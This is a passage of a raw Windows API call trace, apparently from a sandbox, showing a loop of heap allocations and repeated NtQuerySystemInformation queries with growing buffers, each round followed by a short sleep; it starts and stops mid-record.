(HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0249.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0249.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0249.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0249.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0249.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0249.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0249.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0249.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.128] Sleep (dwMilliseconds=0x110) [0249.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0249.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0249.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0249.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0249.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0249.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0249.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0249.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0249.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.164] Sleep (dwMilliseconds=0x110) [0249.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0249.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0249.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0249.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0249.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0249.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0249.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0249.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0249.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.172] Sleep (dwMilliseconds=0x110) [0249.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0249.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0249.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0249.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0249.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0249.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0249.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0249.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0249.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.191] Sleep (dwMilliseconds=0x110) [0249.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0249.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0249.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0249.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0249.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0249.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0249.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0249.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0249.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.208] Sleep (dwMilliseconds=0x110) [0249.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0249.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0249.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0249.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0249.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0249.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0249.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.222] Sleep (dwMilliseconds=0x110) [0249.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0249.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0249.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0249.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0249.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0249.240] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0249.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0249.240] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0249.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.241] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.241] Sleep (dwMilliseconds=0x110) [0249.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0249.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0249.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0249.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0249.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0249.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0249.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0249.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0249.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.254] Sleep (dwMilliseconds=0x110) [0249.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0249.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.263] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0249.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0249.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0249.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0249.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0249.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0249.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0249.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.265] Sleep (dwMilliseconds=0x110) [0249.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0249.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0249.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0249.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0249.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0249.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0249.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0249.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0249.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.285] Sleep (dwMilliseconds=0x110) [0249.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0249.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0249.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0249.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0249.308] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0249.308] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.309] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0249.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.310] Sleep (dwMilliseconds=0x110) [0249.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0249.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0249.340] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0249.340] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0249.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0249.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0249.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0249.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0249.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.344] Sleep (dwMilliseconds=0x110) [0249.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0249.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0249.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0249.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0249.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0249.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0249.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0249.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0249.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.362] Sleep (dwMilliseconds=0x110) [0249.416] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0249.416] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.417] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0249.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0249.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.417] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0249.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0249.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0249.418] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0249.418] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0249.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 